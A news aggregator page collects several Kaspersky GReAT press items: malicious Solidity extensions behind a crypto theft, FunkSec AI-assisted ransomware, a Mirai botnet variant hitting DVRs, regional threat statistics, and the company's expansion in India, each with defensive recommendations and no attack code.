Latest news with #GReAT
Zawya
2 days ago
- Zawya
Kaspersky uncovers $500K crypto heist through malicious packages
Kaspersky GReAT (Global Research and Analysis Team) experts have discovered open-source packages that download the Quasar backdoor and a stealer designed to exfiltrate cryptocurrency. The malicious packages are intended for the Cursor AI development environment, which is based on Visual Studio Code — a tool used for AI-assisted coding. The malicious open-source packages are extensions hosted in the Open VSX repository that claim to provide support for the Solidity programming language. However, in practice, they download and execute malicious code on users' devices. During an incident response, a blockchain developer from Russia reached out to Kaspersky after installing one of these fake extensions on his computer, which allowed attackers to steal approximately $500,000 worth of crypto assets. The threat actor behind these packages managed to deceive the developer by making the malicious package rank higher than the legitimate one. The attacker achieved this by artificially inflating the malicious package's downloads count to 54,000. Search results for the query 'solidity': the malicious extension (highlighted in red) and the legitimate one (highlighted in green). After installation, the victim gained no actual functionality from the extension. Instead, malicious ScreenConnect software was installed on the computer, granting threat actors remote access to the infected device. Using this access, they deployed the open-source Quasar backdoor along with a stealer that collects data from browsers, email clients, and crypto wallets. With these tools, the threat actors were able to obtain the developer's wallet seed phrases and subsequently steal cryptocurrency from the accounts. After the malicious extension downloaded by the developer was discovered and removed from the repository, the threat actor republished it and artificially inflated its installation count to a higher number – 2 million, compared to 61,000 for the legitimate package. The extension was removed from the platform following a request from Kaspersky. 'Spotting compromised open-source packages with the naked eye is becoming increasingly difficult. Threat actors are using increasingly creative tactics to deceive potential victims, even developers who have a strong understanding of cybersecurity risks — particularly those working in the blockchain development field. As we expect adversaries to continue targeting developers, it is recommended that even experienced IT professionals deploy dedicated security solutions to safeguard sensitive data and prevent financial losses,' commented Georgy Kucherin, Security Researcher with Kaspersky's Global Research and Analysis Team. The threat actor behind the attack published not only malicious Solidity extensions but also another NPM package, solsafe, which also downloads ScreenConnect. A few months earlier, three additional malicious Visual Studio Code extensions were released — solaibot, among-eth, and blankebesxstnion — all of them have already been removed from the repository. To stay safe, Kaspersky recommends: Use a solution for monitoring the used open-source components in order to detect the threats that might be hidden inside. If you suspect that a threat actor may have gained access to your company's infrastructure, we recommend using the Kaspersky Compromise Assessment service to uncover any past or ongoing attacks. Verify package maintainers: check the credibility of the maintainer or organization behind the package. Look for consistent version history, documentation, and an active issue tracker. Stay informed on emerging threats: subscribe to security bulletins and advisories related to the open-source ecosystem. The earlier you know about a threat, the faster you can respond. More information is available in a report on About Kaspersky Kaspersky is a global cybersecurity and digital privacy company founded in 1997. With over a billion devices protected to date from emerging cyberthreats and targeted attacks, Kaspersky's deep threat intelligence and security expertise is constantly transforming into innovative solutions and services to protect individuals, businesses, critical infrastructure, and governments around the globe. The company's comprehensive security portfolio includes leading digital life protection for personal devices, specialized security products and services for companies, as well as Cyber Immune solutions to fight sophisticated and evolving digital threats. We help millions of individuals and over 200,000 corporate clients protect what matters most to them. Learn more at
Biz Bahrain
07-07-2025
- Business
- Biz Bahrain
Inside FunkSec: Kaspersky explores the evolution of AI-powered ransomware with password-gated capabilities
Kaspersky experts revealed the inner workings of FunkSec — a ransomware group that illustrates the future of mass cybercrime: AI-powered, multifunctional, highly adaptive and operating on volume with ransoms as low as $10,000 to maximize profits. Kaspersky's Global Research and Analysis Team (GReAT) constantly monitors the ransomware threat landscape, where attacks continue to rise. According to the company's latest State of Ransomware report, the share of users affected by ransomware attacks worldwide increased to 0.44% from 2023 to 2024, up by 0.02 percentage points. While this percentage may appear modest compared to other cyber threats, it reflects the fact that attackers typically prioritize high-value targets rather than mass distribution, making each incident potentially devastating. Within this evolving landscape, FunkSec has emerged as a particularly concerning threat. Active for less than a year since its emergence in late 2024, FunkSec has quickly surpassed many established actors by targeting government, technology, finance and education sectors. What sets FunkSec apart is its sophisticated technical architecture and AI-assisted development. The group packages full-scale encryption and aggressive data exfiltration into a single Rust-based executable, capable of disabling over 50 processes on victim machines and equipped with self-cleanup features to evade defenses. Beyond its core ransomware functionality, FunkSec has expanded its toolkit to include a password generator and a basic DDoS tool — both showing clear signs of code synthesis using large language models (LLMs). FunkSec's approach reflects the evolving landscape of mass cybercrime, combining advanced tools and tactics. Kaspersky's GReAT experts highlight the key features that define their operations: Password-Controlled Functionality GReAT experts discovered that FunkSec ransomware features a unique password-based mechanism that controls its operation modes. Without a password, the malware performs basic file encryption, while providing a password activates a more aggressive data exfiltration process in addition to encryption to steal sensitive data. FunkSec packs full-scale encryption, local exfiltration and self-cleanup into a single Rust binary—without a side-loader or a companion script. That level of consolidation is uncommon and gives affiliates a plug-and-play tool they can deploy almost anywhere. Use of AI in development Code analysis shows that FunkSec is actively using generative artificial intelligence to create its tools. Many parts of the code seem to be automatically generated rather than manually written. Signs of this generic placeholder comments (such as 'placeholder for actual check') and technical inconsistencies, like commands for different operating systems that don't align properly. Additionally, the presence of declared but unused functions—such as modules included upfront but never utilized — reflects how large language models combine multiple code snippets without pruning redundant elements. 'More and more, we see cybercriminals leveraging AI to develop malicious tools. Generative AI lowers barriers and accelerates malware creation, enabling cybercriminals to adapt their tactics faster. By reducing the entry threshold, AI allows even less experienced attackers to quickly develop sophisticated malware at scale,' comments Marc Rivero, Lead Security Researcher at Kaspersky's GReAT. High-volume, low-ransom strategy FunkSec demands unusually low ransom payments, sometimes as little as $10,000, and pairs this with the sale of stolen data at discounted prices to third parties. This strategy appears designed to enable a high volume of attacks, helping the group quickly establish its reputation within the cybercriminal underground. Unlike traditional ransomware groups that seek million-dollar ransoms, FunkSec employs a high-frequency, low-cost model — further underscoring its use of AI to streamline and scale operations. Expands beyond ransomware FunkSec has expanded its capabilities beyond the ransomware binary. Its dark leak site (DLS) hosts additional tools, including a Python-based password generator designed to support brute-force and password-spraying attacks, as well as a basic DDoS tool. Advanced evasion FunkSec employs advanced evasion techniques to avoid detection and complicate forensic analysis. The ransomware is capable of stopping over 50 processes and services to ensure thorough encryption of targeted files. Additionally, it includes a fallback mechanism to execute certain commands even if the user launching FunkSec lacks sufficient privileges. Kaspersky's products detect this threat as HEUR: To stay protected from ransomware attacks, Kaspersky experts recommend organizations follow these best practices to safeguard from ransomware: • Enable ransomware protection for all endpoints. There is a free Kaspersky Anti-Ransomware Tool for Business that shields computers and servers from ransomware and other types of malware, prevents exploits and is compatible with already installed security solutions. • Always keep software updated on all the devices you use to prevent attackers from exploiting vulnerabilities and infiltrating your network. • Focus your defense strategy on detecting lateral movements and data exfiltration to the internet. Pay special attention to outgoing traffic to detect cybercriminals' connections to your network. Set up offline backups that intruders cannot tamper with. Make sure you can access them quickly when needed or in an emergency. • Install anti-APT and EDR solutions, enabling capabilities for advanced threat discovery and detection, investigation and timely remediation of incidents. Provide your SOC team with access to the latest threat intelligence and regularly upskill them with professional training. All of the above is available within Kaspersky Expert Security framework. • Use the latest Threat Intelligence information to stay aware of the actual Tactics, Techniques, and Procedures (TTPs) used by threat actors. • To protect the company against a wide range of threats, use solutions from Kaspersky Next product line that provide real-time protection, threat visibility, investigation and response capabilities of EDR and XDR for organizations of any size and industry. Depending on your current needs and available resources, you can choose the most relevant product tier and easily migrate to another one if your cybersecurity requirements are changing.
Biz Bahrain
11-06-2025
- Biz Bahrain
Kaspersky discovers multiple IoT devices targeted with a new Mirai botnet version
Kaspersky Global Research & Analysis Team (GReAT) researchers have found multiple IoT devices targeted with a new version of the Mirai botnet. The majority of attacked devices were located in China, Egypt, India, Brazil, Turkiye and Russia. Mirai remains one of the top threats to IoT in 2025 due to widespread exploitation of weak login credentials and unpatched vulnerabilities, enabling large-scale botnets for DDoS attacks, data theft and other malicious activities. According to Kaspersky research, there were 1.7 billion attacks on IoT devices (including those made with Mirai) coming from 858,520 devices globally in 2024. 45,708 attacks on IoT devices (including those made with Mirai) were launched from UAE in 2024, which is 54% more than in 2023. To explore IoT attacks, how such attacks are carried out and how to prevent them, Kaspersky set up so called honeypots – decoy devices used to attract the attention of the attackers and analyze their activities. In the honeypots Kaspersky detected the exploitation of the CVE-2024-3721 vulnerability to deploy a bot – it turned out to be a Mirai botnet modification. A botnet is a network of compromised devices infected by malware to perform coordinated malicious activities under the control of an attacker. This time, the focus of the attacks were digital video recorders (DVRs) – these devices are integral to security and surveillance across multiple sectors. They record footage from cameras to monitor homes, retail stores, offices and warehouses, as well as factories, airports, train stations and educational institutions, to enhance public safety and secure critical infrastructure. Attacks on DVR devices can compromise privacy, but beyond that, they can serve as entry points for attackers to infiltrate broader networks, spreading malware and creating botnets to launch DDoS attacks, as seen with Mirai. The discovered DVR bot includes mechanisms to detect and evade virtual machine (VM) environments or emulators commonly used by security researchers to analyze malware. These techniques help the bot avoid detection and analysis, allowing it to operate more stealthily and remain active on infected devices. 'The source code of the Mirai botnet was shared on the internet nearly a decade ago, and since then, it has been adapted and modified by various cybercriminal groups to create large-scale botnets mostly focused on DDoS and resource hijacking. Exploiting known security flaws in IoT devices and servers that haven't been patched, along with the widespread use of malware targeting Linux-based systems, leads to a significant number of bots constantly searching the internet for devices to infect. By analyzing public sources we identified over 50,000 exposed DVR devices online, indicating that attackers have numerous opportunities to target unpatched, vulnerable devices,' comments Anderson Leite, Security Researcher with Kaspersky's GReAT. To reduce the risk of IoT device infection, users should: • Change default credentials and use strong, unique passwords. • Regularly update DVR firmware to patch known vulnerabilities. • Disable remote access if unnecessary or use secure VPNs for management. • Segment DVRs on isolated networks. • Monitor for unusual network traffic to detect potential compromises. Read more about the latest Mirai wave at
Tahawul Tech
27-05-2025
- Business
- Tahawul Tech
Kaspersky shares cybersecurity trends for the META region
Kaspersky's Global Research & Analysis Team shared insights on the cyber threat landscape in the Middle East, Türkiye, and Africa (META) region for the first quarter of 2025. The data revealed that Türkiye and Kenya recorded the highest number of users impacted by web-based threats (26.1% and 20.1% respectively), followed by Qatar at 17.8%. Meanwhile, Jordan, Egypt, UAE and Saudi Arabia reported the lowest share of users targeted by web-borne attacks across the META region. Ransomware remains one of the most destructive cyberthreats this year. According to Kaspersky data, the share of users affected by ransomware attacks increased by 0.02 p.p to 0.44% from 2023 to 2024 globally. In the Middle East the growth is 0.07 p.p. to 0.72%, in Africa: 0.01 p.p. growth to 0.41%, in Türkiye 0,06 p.p. growth to 0.46%. Attackers often don't distribute this type of malware on a mass scale, but prioritize high-value targets, which reduces the overall number of incidents. While the ransomware is not increasing largely, that doesn't mean that it becomes less dangerous. In the Middle East ransomware affected a higher share of users due to rapid digital transformation, expanding attack surfaces and varying levels of cybersecurity maturity. Ransomware is less prevalent in Africa due to lower levels of digitisation and economic constraints, which reduce the number of high-value targets. However, as countries like South Africa and Nigeria expand their digital economies, ransomware attacks are on the rise, particularly in the manufacturing, financial and government sectors. Limited cybersecurity awareness and resources leave many organisations vulnerable, though the smaller attack surface means the region remains behind global hotspots. Ransomware trends AI tools are increasingly being used in ransomware development , as demonstrated by FunkSec, a ransomware group that emerged in late 2024 and quickly gained notoriety by surpassing established groups like Cl0p and RansomHub with multiple victims claimed in December alone. Operating under a Ransomware-as-a-Service (RaaS) model, FunkSec employs double extortion tactics — combining data encryption with exfiltration — targeting sectors such as government, technology, finance, and education in Europe and Asia. The group's heavy reliance on AI-assisted tools sets it apart, with its ransomware featuring AI-generated code, complete with flawless comments, likely produced by Large Language Models (LLMs) to enhance development and evade detection. Unlike typical ransomware groups demanding millions, FunkSec adopts a high-volume, low-cost approach with unusually low ransom demands, further highlighting its innovative use of AI to streamline operations. , as demonstrated by FunkSec, a ransomware group that emerged in late 2024 and quickly gained notoriety by surpassing established groups like Cl0p and RansomHub with multiple victims claimed in December alone. Operating under a Ransomware-as-a-Service (RaaS) model, FunkSec employs double extortion tactics — combining data encryption with exfiltration — targeting sectors such as government, technology, finance, and education in Europe and Asia. The group's heavy reliance on AI-assisted tools sets it apart, with its ransomware featuring AI-generated code, complete with flawless comments, likely produced by Large Language Models (LLMs) to enhance development and evade detection. Unlike typical ransomware groups demanding millions, FunkSec adopts a high-volume, low-cost approach with unusually low ransom demands, further highlighting its innovative use of AI to streamline operations. In 2025, ransomware is expected to evolve by exploiting unconventional vulnerabilities , as demonstrated by the Akira gang's use of a webcam to bypass endpoint detection and response systems and infiltrate internal networks. Attackers are likely to increasingly target overlooked entry points like IoT devices, smart appliances or misconfigured hardware in the workplace, capitalising on the expanding attack surface created by interconnected systems. As organisations strengthen traditional defences, cybercriminals will refine their tactics, focusing on stealthy reconnaissance and lateral movement within networks to deploy ransomware with greater precision, making it harder for defenders to detect and respond in time. , as demonstrated by the Akira gang's use of a webcam to bypass endpoint detection and response systems and infiltrate internal networks. Attackers are likely to increasingly target overlooked entry points like IoT devices, smart appliances or misconfigured hardware in the workplace, capitalising on the expanding attack surface created by interconnected systems. As organisations strengthen traditional defences, cybercriminals will refine their tactics, focusing on stealthy reconnaissance and lateral movement within networks to deploy ransomware with greater precision, making it harder for defenders to detect and respond in time. The proliferation of LLMs tailored for cybercrime will further amplify ransomware's reach and impact. LLMs marketed on the dark web lower the technical barrier to creating malicious code, phishing campaigns and social engineering attacks, allowing even less skilled actors to craft highly convincing lures or automate ransomware deployment. As more innovative concepts such as RPA (Robotic Process Automation ) and LowCode, which provide an intuitive, visual, AI-assisted drag-and-drop interface for rapid software development, are quickly adopted by software developers, we can expect ransomware developers to use these tools to automate their attacks as well as new code development, making the threat of ransomware even more prevalent. 'Ransomware is one of the most pressing cybersecurity threats facing organisations today, with attackers targeting businesses of all sizes and across every region, including META. Ransomware groups continue to evolve by adopting techniques, such as developing cross-platform ransomware, embedding self-propagation capabilities and even using zero-day vulnerabilities that were previously affordable only for APT actors. There is also shift toward exploiting overlooked entry points — including IoT devices, smart appliances, and misconfigured or outdated workplace hardware. These weak spots often go unmonitored, making them prime targets for cybercriminals', said Sergey Lozhkin, Head of META and APAC regions in Global Research and Analysis Team at Kaspersky. 'To stay secure, organisations need a layered defence: up-to-date systems, network segmentation, real-time monitoring, robust backups, and continuous user education'. Kaspersky experts continuously monitor highly sophisticated cyberattacks, including the activity of 25 advanced persistent threat (APT) groups currently operating in the META region. Among these are well-known actors such as SideWinder, Origami Elephant, and MuddyWater. Kaspersky has observed a growing use of creative exploits targeting mobile devices, along with ongoing advancements in techniques designed to evade detection – key trends shaping today's targeted attack landscape. Kaspersky encourages organisations to follow these best practices to safeguard their digital assets: Always keep software updated on all the devices you use to prevent attackers from exploiting vulnerabilities and infiltrating your network. Focus your defence strategy on detecting lateral movements and data exfiltration to the Internet. Pay special attention to outgoing traffic to detect cybercriminals' connections to your network. Set up offline backups that intruders cannot tamper with. Make sure you can access them quickly when needed or in an emergency. Provide your SOC team with access to the latest threat intelligence and regularly upskill them with professional training. Use the latest Threat Intelligence information to stay aware of the actual Tactics, Techniques, and Procedures (TTPs) used by threat actors. To protect the company against a wide range of threats, use solutions from the Kaspersky Next product line that provide real-time protection, threat visibility, investigation and response capabilities of EDR and XDR for organisations of any size and industry. Depending on your current needs and available resources, you can choose the most relevant product tier and easily migrate to another one if your cybersecurity requirements are changing. Image Credit: Kaspersky
Time of India
27-04-2025
- Business
- Time of India
Cybersecurity firm Kaspersky bets big on India as key growth market
Cybersecurity firm Kaspersky is betting on India as a strategic growth market, recognising the country's rapid digitalisation and increasing cybersecurity needs, and aims to expand local teams and strengthen collaborations across various sectors. General Manager for India region at Kaspersky Jaydeep Singh shared that the company has tripled its workforce in the country in the past two years, with new hires in sales, pre-sales, and support roles. He also highlighted the presence of global research teams based in India that monitor more than 900 advanced persistent threat (APT) groups daily. "In the last two years, we have tripled our employee base in have part of the global research teams based out of India who do the threat hunting," Singh told PTI on the sidelines of GITEX Asia 2025. GReAT (Kaspersky Global Research and Analysis Team) plays a crucial role in Kaspersky's global threat intelligence operations. Kaspersky is investing in digital footprint intelligence (DFI) analysts to bolster services, including brand monitoring and takedown operations. Kaspersky views India as a key innovation hub and plans to continue expanding its resources and research capabilities within the country. "We are expanding quite a bit both in respect to our key resources, and researchers in the Indian geography," Singh noted. The company emphasises its commitment to building local talent and is actively collaborating with government agencies and private sector entities to enhance cybersecurity awareness and infrastructure. Kaspersky is engaging with state governments and nodal agencies like CERT-In to develop cyber defence programmes and training initiatives. Singh also praised the Indian regulatory environment, highlighting the pragmatic nature of acts like the Digital Personal Data Protection Act (DPDP) and robust guidelines from agencies such as the RBI and SEBI. He anticipates further developments in AI regulation and expressed Kaspersky's willingness to collaborate and provide input to policymakers. With a growing base of internet users, the need for robust cyber technologies is rapidly increasing, especially to protect internet-facing assets, mobile handsets, and operational technology (OT) systems. Kaspersky detects over 450,000 unique malware samples daily, leveraging AI and machine learning in its research and mitigation strategies. Singh emphasised the need to create a " cyber immune world " where systems are highly resistant to breaches, particularly in both IT and OT environments. "What we are seeing in the last decade or so is that the intensity of attacks on the IT systems and the OT systems has increased tremendously. So, we expect that cyber immunity as a concept will become stronger and will become more relevant over the next decade time also. "So, Kaspersky is investing big time in India, in the last 2 years we have increased our commitment nearly three times. What we looking at is India to be a innovation hub for us. A hub for a lot of collaboration with agencies, and we see great potential over the next decades' time to be part of the India's growth story and a part of this cyber resilience story for the Indian market," Singh said. The Russian firm recorded a double-digit growth in India in 2024.
